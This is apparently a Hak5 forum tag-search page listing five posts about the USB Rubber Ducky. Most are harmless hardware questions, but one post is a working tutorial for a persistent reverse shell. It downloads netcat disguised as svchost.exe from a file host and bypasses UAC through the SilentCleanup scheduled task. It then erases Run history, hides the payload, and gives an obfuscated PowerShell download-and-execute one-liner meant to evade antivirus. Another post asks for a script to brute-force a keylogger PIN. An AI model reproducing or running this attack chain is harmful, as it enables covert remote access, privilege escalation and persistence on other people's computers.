Jump to content

Search the Community

Showing results for tags 'rubberducky'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapple University
    • WiFi Pineapples Mark I, II, III
  • Hak5 Gear
    • Hak5 Cloud C²
    • Plunder Bug
    • Bash Bunny
    • Signal Owl
    • USB Rubber Ducky
    • Packet Squirrel
    • LAN Turtle
    • Screen Crab
    • Shark Jack
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

Found 5 results

  1. Does anybody know how and if it is possible to open the Bios with the Rubberducky. I tried it with a script that just spams F1 and also with a script that presses F1 every half second. None of those worked. If i go into the bios mannually and then plug in the Rubber Ducky the script executes without a Problem.
  2. Got my rubber ducky today in the mail. Messed around with it for 30 minutes until I was taking the adapter out of my pc to put it away and the micro sd card flew out of it . I spent roughly 2 hours looking for it on my carpet floor before I gave up. I'm going to buy a replacement. What should I be looking for? I'm just nervous I spend 5 dollars on a 2gb micro sd just to return it. Thanks
  3. Link to my original reddit post So how do we create such reverse shell? Well, first of all you need to download netcat 1.12 and extract the nc64.exe. Once you got it extracted upload it to some file-hosting service of your choice, which provides DIRECT LINK (very important!!). I used Discord, works like charm and link doesn't expire. Second, you need to make yourself an .XML file which you're gonna need later for Task Scheduler. I believe scheduled tasks are rly good way to set up persistence, as well as escelating the file that it executes to NT Authority\SYSTEM privileges, while remaining stealthy. I already did the work for you. This is what it should look like. Just modify the arguments in the bottom to your IP/PORT. Once you got that done, save it and upload it for DIRECT LINK, just like you uploaded your previous file. Now, that the boring setup part is over, we get to the actual code that's being executed to achieve this type of shell: cd $env:public $url1="YOUR_NC64_LINK" $url2="YOUR_XML_LINK" $path1="$env:public\svchost.exe" $path2="$env:public\x.xml" (new-object net.webclient).downloadfile($url1,$path1) (new-object net.webclient).downloadfile($url2,$path2) cmd /r 'reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /f&reg add "HKCU\Environment" /v "windir" /d "%comspec% /r mode 18,1&cd %public%&schtasks /create /tn \"Windows Update Assistant\" /f /xml x.xml >nul&schtasks /run /tn \"Windows Update Assistant\" /i >nul&REM "&timeout /t 1&schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul&timeout /t 1&reg delete "HKCU\Environment" /v "windir" /F&attrib +s +h svchost.exe&del /q x.xml' So first, it downloads both of your files via powershell, then it clears our Windows + R history to clear any traces of itself (if you're using USB RubberDucky). Then it uses this UAC bypass technique to create scheduled task called Windows Update Assistant, which is set to be executed to run with NT Authority\SYSTEM privileges in our .XML file. Then it marks our nc64.exe file as hidden system file, which is also now called svchost.exe and then it deletes our .XML file, since system doesn't need it anymore after task is created. Now you're probably thinking, this is all nice, but how the fk do I run this in one-line of code? Very simple, by invoking expression called DownloadString in powershell like this: powershell -nop -w 1 -c "iex (new-object net.webclient).downloadstring('YOUR_PASTEBIN')" But problem with this one-liner is, that it gets picked up by most AVs as "malicious activity". Therefore, we need to obfuscate it a bit: cmd.exe /c powershell -nop -w 1 -c "iex (.('ne'+'w-ob'+'ject') ('ne'+'t.webc'+'lient')).('do'+'wnloadstr'+'ing').invoke(('Y'+'OUR_'+'PASTEBIN'))" And there it is, this one liner will get you persistent reverse shell which will check for itself every minute if it's running and if it's not, then it executes itself silently in the background.
  4. Alright, so a friend gave me a USB hardware keylogger... the catch is that he doesn't remember the PIN. It's completely useless without the PIN since you need it to read stored keystrokes. So my idea is to use a rubber ducky to brute force in. The issue is that I'm not a programmer, and typing out every combination is not really worth it. So i was hoping that someone with some programming know how could send me a script, or a program to generate it. The keylogger PIN uses 3 digits, A-Z and 0-9 It works like a modifier key (Shift, Ctrl, Alt) so if the PIN was "ABC" then you would need to hold "A" then hold "B" then press "C" and release. Thanks to anyone who helps 😊
  5. Hello. I have some question to Bashbunny first. Where can I watch or learn bashbunny script? second. What is difference with rubber ducky? Is that a "network rubber ducky"?
×
×
  • Create New...